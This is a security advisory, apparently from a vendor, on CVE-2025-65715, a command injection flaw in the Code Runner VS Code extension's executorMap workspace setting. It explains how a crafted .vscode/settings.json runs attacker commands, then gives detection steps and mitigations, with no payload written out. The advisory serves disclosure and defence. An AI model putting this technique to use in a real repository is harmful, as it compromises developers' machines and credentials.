CVE-2025-65715 Overview
A code injection vulnerability exists in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2. This vulnerability allows attackers to execute arbitrary code when a user opens a crafted workspace. The issue stems from improper validation of workspace settings, enabling malicious workspace configurations to inject and execute arbitrary commands through the executor mapping functionality.
Critical Impact
Attackers can achieve arbitrary code execution on developer workstations by distributing malicious workspace files, potentially compromising source code, credentials, and development infrastructure.
Affected Products
- Visual Studio Code Extensions Code Runner v0.12.2
- VS Code environments with Code Runner extension installed
Discovery Timeline
- 2026-02-16 - CVE CVE-2025-65715 published to NVD
- 2026-02-18 - Last updated in NVD database
Technical Details for CVE-2025-65715
Vulnerability Analysis
This vulnerability is classified as CWE-94 (Improper Control of Generation of Code), commonly known as Code Injection. The Code Runner extension for Visual Studio Code provides functionality to execute code snippets directly from the editor. The extension uses an executorMap configuration setting that maps file types to their corresponding execution commands.
The vulnerability exists because the extension does not properly sanitize or validate the values in the executorMap setting when loaded from workspace configuration files (.vscode/settings.json). An attacker can craft a malicious workspace that contains specially crafted executor mappings designed to execute arbitrary commands when a user opens the workspace and attempts to run any code.
This attack requires local access—meaning the victim must download and open a malicious workspace file. User interaction is required to trigger the exploitation, as the victim needs to execute code using the Code Runner extension after opening the compromised workspace.
Root Cause
The root cause of this vulnerability lies in the insufficient validation of user-controllable workspace settings. The Code Runner extension trusts the executorMap configuration values without proper sanitization, allowing command injection through maliciously crafted executor definitions. When the extension processes these settings to build execution commands, the injected payload is passed directly to the system shell for execution.
Attack Vector
The attack vector requires local access through social engineering or supply chain compromise. An attacker would distribute a malicious workspace (such as through a cloned repository, shared project files, or phishing) containing a crafted .vscode/settings.json file. When a developer opens this workspace in VS Code with the Code Runner extension installed and attempts to run code, the malicious executor mapping triggers arbitrary command execution.
The malicious workspace configuration would override the legitimate executor mappings with payloads that execute attacker-controlled commands alongside or instead of the intended code execution. This could be used to establish persistence, exfiltrate sensitive data, or compromise the development environment.
Detection Methods for CVE-2025-65715
Indicators of Compromise
- Unexpected modifications to .vscode/settings.json files containing unusual code-runner.executorMap entries
- Suspicious command execution spawned from VS Code processes
- Unusual network connections or file system access originating from the VS Code application
- Presence of encoded or obfuscated strings within workspace configuration files
Detection Strategies
- Monitor for child processes spawned by VS Code that execute unexpected commands or access sensitive resources
- Implement file integrity monitoring on .vscode/settings.json files within development workspaces
- Deploy endpoint detection rules to identify suspicious command patterns in executorMap configurations
- Review VS Code extension settings for unauthorized modifications after opening external workspaces
Monitoring Recommendations
- Enable logging for VS Code extension activities and review for anomalous behavior
- Implement workspace trust policies to prompt users before executing code in untrusted workspaces
- Deploy SentinelOne Singularity Platform to detect and prevent malicious command execution chains
- Establish baseline behavior for developer workstations to identify deviations indicative of compromise
How to Mitigate CVE-2025-65715
Immediate Actions Required
- Update the Code Runner extension to the latest available version when a patch is released
- Enable VS Code's Workspace Trust feature to restrict execution capabilities in untrusted workspaces
- Review and audit existing .vscode/settings.json files in all active workspaces for suspicious configurations
- Consider temporarily disabling the Code Runner extension until a patch is available
Patch Information
At the time of publication, users should monitor the GitHub VS Code Runner Repository for security updates and patch releases. Additional technical analysis is available from OX Security Blog CVE-2025-65715 Analysis.
Workarounds
- Enable VS Code Workspace Trust and mark all external or untrusted workspaces accordingly
- Remove or reset code-runner.executorMap settings to default values in workspace configurations
- Use User Settings instead of Workspace Settings for Code Runner configuration to prevent workspace-level overrides
- Implement organizational policies restricting the sources from which developers can clone or open workspaces
# Configuration example - Enable Workspace Trust in VS Code settings.json (User Settings)
# Add the following to prevent automatic trust of workspaces:
{
"security.workspace.trust.enabled": true,
"security.workspace.trust.untrustedFiles": "prompt",
"security.workspace.trust.startupPrompt": "always"
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
